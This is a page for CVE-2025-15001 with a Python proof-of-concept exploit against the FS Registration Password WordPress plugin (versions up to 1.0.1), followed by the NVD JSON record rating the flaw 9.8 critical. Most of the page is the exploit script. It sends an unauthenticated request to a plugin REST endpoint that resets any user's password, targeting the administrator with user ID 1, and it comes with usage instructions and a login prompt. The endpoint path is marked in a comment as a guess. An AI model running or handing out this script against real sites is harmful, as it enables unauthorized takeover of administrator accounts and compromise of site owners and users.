CVE-2025-15001

import requests import sys # CVE-2025-15001 PoC - FS Registration Password Account Takeover # Target: WordPress with FS Registration Password plugin <= 1.0.1 def exploit_account_takeover(target_url, target_username, new_password): """ Exploit the privilege escalation vulnerability in FS Registration Password plugin to take over any user account including administrators. Args: target_url: Target WordPress site URL target_username: Username to takeover new_password: New password to set Returns: bool: True if exploitation successful, False otherwise """ # Endpoint for password reset/update (typical WordPress REST API endpoint) endpoint = f"{target_url.rstrip('/')}/wp-json/registration-password/v1/password" # Malicious payload to bypass identity verification payload = { 'username': target_username, 'password': new_password, 'user_id': 1 # Try to target admin user (ID=1) } headers = { 'Content-Type': 'application/json', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' } try: print(f"[*] Targeting: {target_url}") print(f"[*] Attempting to takeover account: {target_username}") # Send malicious password update request without authentication response = requests.post(endpoint, json=payload, headers=headers, timeout=10) if response.status_code == 200: result = response.json() if result.get('success') or result.get('status') == 'updated': print(f"[+] SUCCESS: Password changed for user '{target_username}'") print(f"[+] New password: {new_password}") print(f"[!] Login at: {target_url}/wp-admin") return True print(f"[-] Failed: Status code {response.status_code}") print(f"[-] Response: {response.text[:200]}") return False except requests.exceptions.RequestException as e: print(f"[-] Request error: {str(e)}") return False if __name__ == '__main__': if len(sys.argv) < 4: print("Usage: python cve-2025-15001.py <target_url> <username> <new_password>") print("Example: python cve-2025-15001.py http://target.com admin P@ssw0rd123") sys.exit(1) target = sys.argv[1] username = sys.argv[2] password = sys.argv[3] exploit_account_takeover(target, username, password)

{"cve": {"id": "CVE-2025-15001", "sourceIdentifier": "[email protected]", "published": "2026-01-06T05:16:04.443", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The FS Registration Password plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 1.0.1. This is due to the plugin not properly validating a user's identity prior to updating their password. This makes it possible for unauthenticated attackers to change arbitrary user's passwords, including administrators, and leverage that to gain access to their account."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/registration-password/tags/1.0.1/src/WP/Auth.php", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3431651/registration-password", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/22351b90-fc34-44ce-9241-4a0f01eb7b1c?source=cve", "source": "[email protected]"}]}}